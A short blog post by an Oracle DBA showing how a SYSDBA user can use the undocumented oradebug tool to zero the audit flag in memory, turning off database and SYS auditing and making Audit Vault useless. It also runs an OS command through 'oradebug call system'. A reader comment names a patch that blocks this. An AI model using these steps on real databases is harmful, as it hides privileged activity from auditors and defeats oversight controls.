Disable Auditing Using Oradebug

in 2011 Laszlo Toth Show some Oracle tricks to disable Auditing In Oracle Database included with SYS auditing using simple command Called oradebug, Just as note oradebug is undocumented in all oracle versions and if you have sysdba role privileges you can do a lot of things with this command :

the below is the demonstration :


sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

Just as note with oradebug you Audit vault become useless. another tricks that we can use oradebug to call Database command using OS :) 

SQL> oradebug call system    “ls -la >/tmp/hacktivity.txt”

Thank you
Osama mustafa

Comments

  1. Hi, there is possibility to disable oradebug in 11.2.0.3 (with Patch 15964729) with the parameter "_fifteenth_spare_parameter". With the parameter value restricted is not more possible to execute poke, setvar, call, etc.

    ReplyDelete

Post a Comment

Popular posts from this blog

Connection refused; No available router to destination On Weblogic Node Manager Log

How to change SGA in Oracle Rac

SGA_MAX_SIZE & SGA_TARGET / MEMORY_TARGET & MEMORY_MAX_TARGET